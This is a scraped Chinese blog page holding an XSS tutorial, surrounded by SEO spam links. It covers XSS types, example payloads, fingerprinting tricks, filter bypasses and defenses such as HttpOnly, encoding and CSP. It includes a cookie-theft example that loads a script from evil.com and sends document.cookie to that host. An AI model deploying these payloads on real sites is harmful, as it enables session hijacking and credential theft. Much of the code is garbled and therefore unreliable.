当前位置: 首页 > news >正文

中山网站建设文化方案网站开发的几个步骤

中山网站建设文化方案,网站开发的几个步骤,wordpress影视解析插件,电脑页游排行榜前十名文章目录 0x01 简介0x02 XSS Payload用法XSS攻击平台及调试JavaScript 0x03 XSS构造技巧XSS漏洞防御策略 跨站脚本攻击#xff0c;Cross Site Script。#xff08;重点在于脚本script#xff09; 分类 反射型、存储型DOM型 漏洞原理#xff1a;通过插入script篡改“HTML”… 文章目录 0x01 简介0x02 XSS Payload用法XSS攻击平台及调试JavaScript 0x03 XSS构造技巧XSS漏洞防御策略 跨站脚本攻击Cross Site Script。重点在于脚本script 分类 反射型、存储型DOM型 漏洞原理通过插入script篡改“HTML”内容控制浏览器的一种攻击。也可以说 诱导用户执行XSS Payload. 0x01 简介 反射型 / 非持久型XSS   定义用户输入 “反射” 给 浏览器 示例   攻击方式注入、诱导点击 常用脚本标签 scriptalert(1)/script 脚本为协议a href’’javascript:alert(1) 编码输入: img src1 οnerrοra#x6c;alert(1)存储型 / 持久性XSS   定义将含有script的文本/文件/数据等的 用户输入存储到server。 攻击方式存储内容的地方如博客文件上传的地方。 DOM型   定义修改页面的DOM节点形成。从效属于反射型XSS。 示例 将 a href onlickalert(/xss/)// 内容/a 替换下面的a标签。 0x02 XSS Payload用法 实现XSS攻击script被 称为“XSS Payload” cookie攻击/cookie劫持构造GET与POST请求XSS钓鱼识别浏览器识别软件真实IP cookie劫持示例 //1 使用户 加载远程脚本 http://www.a.com/test.htm?abcscript srchttp://www.evil.com/evil.js /script //2 在evil.js中的代码窃取Cookie var img document.createElement(img); img.src http://www.evil.com/log?escape(document.cookie); document.body.appendChild(img); //3 到server看cookie登录相同页面输入防止“Cookie劫持”方法Cookied的“HttpOnlu”标识 构造GET与POST请求 具体方式构造url、图片或表单、通过XMLHttpRequest发送一个POST请求。 # 构造相关url http://../XX?mdeleteid123383 # 构造并插入图片 var img document.createElement(img); img.src http://xx?mdeleteid123383; document.body.appenChild(img);构造时若js麻烦直接使用html XSS钓鱼 实现思路利用JS在页面伪造登录框输入密码后被发送到黑客的server。被用来窃取密码。 识别用户浏览器   为深入渗透时可能需要知道用户个人信息就可能要进行浏览器内存攻击给计算机植入木马。   方法用JS获取浏览器User-Agent;   缺点可被代理伪造 更准确的方法根据不通浏览器同一浏览器不通版本差别 来识别。 安全研究者Gareth Heyes曾经找到一种更巧妙的方法。 //Firefox detector 2/3 by DoctorDan FF/a/[-1]a //Firefox 3 by me:- FF3(function x(){})[-5]x //Firefox 2 by me:- FF2(function x(){})[-6]x //IE detector I posted previously IE\vv //Safari detector by me Saf/a/.__proto__// //Chrome by me Chr/source/.test((/a/.toString)) //Opera by me Op/^function \(/.test([].sort) //IE6 detector using conditionals try {IE6cc_on _jscript_version 5.7_jscript_build10000精简为一行代码即 B(function x(){})[-5]x?FF3:(function x(){})[-6]x?FF2:/a/ [-1]a?FF:\vv?IE:/ a/.__proto__//?Saf:/s/. test(/a/.toString)?Chr:/^function \(/.test([].sort)?Op:Unknown识别用户安装软件 浏览器的ActiveX的clas-sid是否有软件的控件clas-sid 插件对象有访问全部插件的权限 XSS攻击平台及调试JavaScript 收集了XSS Payload。演示XSS的危害及方便渗透使用。 Attack APIBeEFXSS-Proxy 调试JSFirebug、HttpWatch、Fiddler 0x03 XSS构造技巧 利用字符编码 通过输入端与返回不同编码导致转义失效绕过 长度限制 XSS Payload插入时大多有内容长度限制限制了字符如何绕喃   答1利用事件Event缩短字节数 input typetext value onclickalert(1)/// 最好有“藏代码地方”用事件调用“location.hash”并且其内容不会再HTTP包发送serverserver日志找不到。 js: onclickeval(location.hash.substr(1)) url:http://xx/#alert(1) 当可以控制2个框内容时也可抓包将输入框之间的HTML内容注释掉来突破输入字节限制。用 base标签 使用base标签来劫持 服务器上 用相对地址的图片window.name绕过xss限制 XSS 防御 HttpOnly禁止页面的JavaScript访问带有HttpOnly属性的cookie。不同语言有不同设置httponly的方法输入检查被称为“XSS Filter”。对敏感字符检查网上有许多开源的XSS Filter输入检查。输出检查检查富文本内容、编码 / 转义输出变量 常见 XSS编码绕过编码JS编码、HTML实体编码和URL编码 XSS漏洞防御策略 漏洞原理代码和数据不分离。表现对用户的输入进行原样地输出。 防御 输入环节 ​ 限制页面输入长度、特殊字符、后端代码限制输入长度和特殊字符前后分离 ​ 使用过滤器统一处理 优先使用开源工具包如apache text、owasp AntiSamy或自定义处理规则或购买第三方解决方案如阿里云防火墙 Cookie防护: ​ cookie属性设置为只可读 httpOnly ​ X-Frame-Options 响应头是否优先 frame、iframe等标记 输出环节 ​ 显示时对字符进行转义处理几乎完全依赖第三方开源 XSS解决方案 内容安全策略CSPspringboot提供额外安全层site发送CSP头部授权浏览器授权和禁止操作 xss 漏洞修复建议 因为xss漏洞涉及输入和输出两部分所以其修复也分为两种。 • 过滤输入的数据包括“’” “””“”“〉”“ on ”等非法字符 • 对输出到页面的数据进行相应的编码转换包括HTML实体编码、 JavaS cript 编码等
http://www.pierceye.com/news/345322/

相关文章:

  • idea 网站开发最好的免费推广平台
  • 专业排名优化网站怎么建网站教程视频app
  • 全国八大员报名官方网站支付宝小程序开发工具
  • 怎么查看vps网站服务器时间中国建设会计协会网站
  • 门户网站上的广告怎么做深圳服装网站建设
  • 公司网站上线的通知抚州营销型网站建设
  • 中国住房城乡和城乡建设部网站小广告文案
  • 做带字头像的网站wordpress 翻页设置
  • 网站横幅js代码公众号如何申请
  • 找网站建设需要问什么软件物联网平台功能
  • 含山县城市建设有限公司网站成都中高风险地区名单最新
  • 鄂州手机网站建设深圳seo网站设计
  • 网站内容的实现方式建筑设计人才招聘
  • 网站做优化效果怎样iis怎么做网站空间
  • 重庆市建设局网站郑州网站建设哪一家好
  • wordpress指定分类广告金融网站排名优化
  • 美妆网站建设方案陕西网络公司网站建设
  • 北京地铁建设的网站深圳建网站兴田德润可信
  • 平台门户网站建设企业战略规划方案
  • 北京网站备案的地址住房和城乡建设部网站质保金
  • 网络营销自学网站腾讯云服务器cvm
  • 建设旅行网站策划书浙江省职业能力建设处网站
  • 网站项目建设的组织机构wordpress做登录
  • 定制杯子岳阳优化营商环境
  • 中学院新校区建设专题网站如何搭建网络教学平台
  • 网站开发课程设计体会房地产查询官网
  • 网站建设 响应式 北京出口外贸网站建设
  • 做网站图片格式做旅游网站的yi
  • 公司网站做二维码网址人防门电气图纸符号大全久久建筑网
  • 电商网站特点中国制造网怎么注册